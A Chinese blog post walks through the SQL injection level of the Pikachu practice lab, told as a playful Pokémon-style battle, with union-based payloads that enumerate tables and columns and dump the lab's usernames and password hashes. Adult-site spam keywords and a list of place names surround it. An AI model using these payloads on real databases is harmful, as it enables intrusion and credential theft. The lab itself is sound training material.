最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網 會員登陸 & 注冊

Pikachu 漏洞練習平臺Sql Injection數(shù)字型注入(post)通關指南pika~pika~

2023-03-05 13:21 作者:Yukito_online  | 我要投稿

Sql Inject(SQL注入)概述(CTRL+C+V來的)

  • 哦,SQL注入漏洞,可怕的漏洞。

  • 在owasp發(fā)布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首當其沖的就是數(shù)據(jù)庫注入漏洞。
    ? ? ? ? ? ? ? ? ? ? ? ?一個嚴重的SQL注入漏洞,可能會直接導致一家公司破產!
    ?SQL注入漏洞主要形成的原因是在數(shù)據(jù)交互中,前端的數(shù)據(jù)傳入到后臺處理時,沒有做嚴格的判斷,導致其傳入的“數(shù)據(jù)”拼接到SQL語句中后,被當作SQL語句的一部分執(zhí)行。 ? ? ? 從而導致數(shù)據(jù)庫受損(被脫褲、被刪除、甚至整個服務器權限淪陷)。
    ? ? ? ? ? ? ? ? ? ?

  • 在構建代碼時,一般會從如下幾個方面的策略來防止SQL注入漏洞:
    1.對傳進SQL語句里面的變量進行過濾,不允許危險字符傳入;
    2.使用參數(shù)化(Parameterized Query 或 Parameterized Statement);
    3.還有就是,目前有很多ORM框架會自動使用參數(shù)化解決注入問題,但其也提供了"拼接"的方式,所以使用時需要慎重!


  • ? ? ? ? ? ? ? ? ? ?
  • SQL注入在網絡上非常熱門,也有很多技術專家寫過非常詳細的關于SQL注入漏洞的文章,這里就不在多寫了。
    你可以通過“Sql Inject”對應的測試欄目,來進一步的了解該漏洞。? ? ?? ? ? ? ? ? ? ?

我反手就是一個開啟burp抓包,當然也可以用postman

選擇1,查詢!

觀察數(shù)據(jù)包,id=1就決定注入點是你了!上吧!!

Yukito對數(shù)據(jù)包使用了Send to Repeater

面對Yukito的Send to Repeater!,服務器的回應是:

hello,vince

your email is: vince@pikachu.com


服務器的回合!

pika~pika~

服務器對Yukito使出了賣萌技能!什么都沒有發(fā)生!


Yukito的回合!


Yukito對服務器使用了id=1-1

面對Yukito的id=1-1!服務器的回應是!

您輸入的user id不存在,請重新輸入!


服務器的回合!

pika~pika~

服務器對Yukito使出了賣萌技能!什么都沒有發(fā)生!


Yukito的回合!

Yukito對服務器使用了id=1 order by 3#!效果拔群!!

面對Yukito的id=1 order by 3#服務器的回應是!

Unknown column '3' in 'order clause'


服務器的回合!

pika~pika~

服務器對Yukito使出了賣萌技能!什么都沒有發(fā)生!


Yukito的回合!


Yukito對服務器使用了id=1 union select version(),database()#!效果拔群!!

面對Yukito的id=1 union select version(),database()#!服務器的回應是!

hello,vince

?your email is: vince@pikachu.com?class='notice'

hello,5.7.26

your email is: pikachu!


服務器的回合!

pika~pika~

服務器對Yukito使出了賣萌技能!什么都沒有發(fā)生!


Yukito的回合!

Yukito對服務器使用了id=1 union select 1,table_name from information_schema.tables where table_schema =database()#!效果拔群??!

面對Yukito的id=1 union select 1,table_name from information_schema.tables where table_schema =database()#服務器的回應是!

hello,vince?

your email is: vince@pikachu.com

hello,1?

your email is: httpinfo

hello,1

your email is: member

hello,1?

your email is: message

hello,1?

your email is: users

hello,1?

your email is: xssblind

服務器的回合!

pika~pika~

服務器對Yukito使出了賣萌技能!什么都沒有發(fā)生!


Yukito的回合!

Yukito對服務器使用了id=1 union select 1,column_name from information_schema.columns where table_name ="users"#!效果拔群?。?/span>

面對Yukito的id=1 union select 1,column_name from information_schema.columns where table_name ="users"#!服務器的回應是!

hello,vince

your email is: vince@pikachu.com

hello,1

your email is: user_id

hello,1?

your email is: first_name

hello,1?

your email is: last_name

hello,1?

your email is: user

hello,1

your email is: password

hello,1

your email is: avatar

hello,1

your email is: last_login

hello,1?

your email is: failed_login

hello,1?

your email is: CURRENT_CONNECTIONS

hello,1

your email is: TOTAL_CONNECTIONS

hello,1?

your email is: id

hello,1?

your email is: username

hello,1?

your email is: level


服務器的回合!

pika~pika~

服務器對Yukito使出了賣萌技能!什么都沒有發(fā)生!


Yukito的回合!

Yukito對服務器使用了id=1 union select username,password from users#!效果拔群!!

面對Yukito的id=1 union select username,password from users#服務器的回應是!

hello,vince?

your email is: vince@pikachu.com

hello,admin?

your email is: e10adc3949ba59abbe56e057f20f883e

hello,pikachu?

your email is: 670b14728ad9902aecba32e22fa4f6bd

hello,test

your email is: e99a18c428cb38d5f260853678922e03

服務器倒下了!

Yukito獲得了勝利!

不光是burp一個工具可以使用,我們來看postman的表現(xiàn)!







Pikachu 漏洞練習平臺Sql Injection數(shù)字型注入(post)通關指南pika~pika~的評論 (共 條)

分享到微博請遵守國家法律
蚌埠市| 德江县| 牙克石市| 海南省| 光山县| 新绛县| 龙里县| 鹿邑县| 闽清县| 新巴尔虎左旗| 浠水县| 武陟县| 华容县| 沂南县| 肇源县| 新宾| 泰兴市| 右玉县| 天祝| 开平市| 绥芬河市| 巩留县| 田阳县| 邹平县| 庆城县| 都昌县| 镇巴县| 慈溪市| 大姚县| 友谊县| 南溪县| 晋城| 筠连县| 砚山县| 辽阳市| 灌阳县| 新晃| 勃利县| 泸州市| 南郑县| 宁河县|